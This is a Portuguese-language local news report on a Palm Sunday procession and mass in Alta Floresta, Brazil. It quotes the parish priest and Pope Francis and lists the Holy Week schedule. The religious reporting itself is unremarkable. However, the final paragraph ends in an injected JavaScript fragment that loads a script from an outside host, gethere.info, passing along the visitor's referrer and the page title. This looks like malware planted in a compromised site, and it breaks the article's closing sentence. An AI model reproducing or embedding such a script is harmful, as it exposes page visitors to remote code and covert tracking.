Capa / Cidades / Fiéis participam da missa de Ramos, Igreja fica lotada

Fiéis participam da missa de Ramos, Igreja fica lotada

GEDSC DIGITAL CAMERA

Dionéia Martins

Ontem a Igreja Católica celebrou o Domingo de Ramos. Os católicos se encontraram na Praça Cívica, de Alta Floresta, às 7 horas, onde o padre Isaias de Andrade deu início à celebração com a benção dos ramos, em seguida os fiéis saíram em procissão cantando e rezando até a igreja matriz onde foi celebrada a missa.
Com a Igreja lotada o padre celebrou a missa, lembrando que o Domingo de Ramos é para lembrar o compromisso dos cristãos em seguir os passos de Jesus. “A procissão é para lembrar a entrada solene de Jesus em Jerusalém”, disse o padre antes da procissão.
Marcando o fim da Quaresma, o Domingo de Ramos lembra os quarenta dias que Jesus ficou no deserto, antes de começar a vida pública; os quarenta dias do dilúvio; os quarenta anos de peregrinação do povo judeu pelo deserto e os quarenta dias de Moisés e de Elias na montanha.
Na homilia o religioso disse que a Semana Santa é o período de preparar os corações com jejum, oração e caridade, e que o jejum é um esvaziamento para deixar mais leve para Deus habitar no coração. “Tiramos o orgulho, a prepotência, a raiva, o ódio, a inveja, a mentira, quando nos esvaziamos disso tudo, Deus habita em nosso coração”, lembrou o pároco durante a celebração.
O evangelho de ontem lembrava que Jesus entrou na cidade de Jerusalém montado em um animal de pobre o jumentinho, como um rei humilde e servidor. Ontem durante a missa de Ramos na Praça São Pedro, no Vaticano, o Papa Francisco denunciou a “indiferença” global perante os que sofrem, a exemplo de Jesus que sentiu na própria pele a indiferença após a entrada triunfal em Jerusalém.
Após ter abençoado os ramos de palma e de oliveira, junto ao obelisco central da praça, o Papa apresentou uma reflexão sobre a figura de Jesus Crucificado, “a cátedra de Deus”.
“Convido-vos, nesta semana, a olhar muitas vezes para esta ‘cátedra de Deus’, para aprender o amor humilde, que salva e dá a vida, para renunciar ao egoísmo, à busca do poder e da fama”, disse o Papa Francisco aos presentes.
Os ramos bentos neste dia são usados para fazer a cinza que é usada no primeiro dia da quaresma, quarta-feira de cinzas, em que os fiéis são marcados na testa com o sinal da cruz com as cinzas.
Nesta última semana da Quaresma, a Semana Santa, a igreja terá atividades todos os dias nas comunidades, na quarta-feira haverá missa às 16 horas de unção para os idosos e doentes, na quinta-feira acontece a missa dos lava pés, e na sexta-feira às 6 horas da manhã via sacra nas comunidades.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top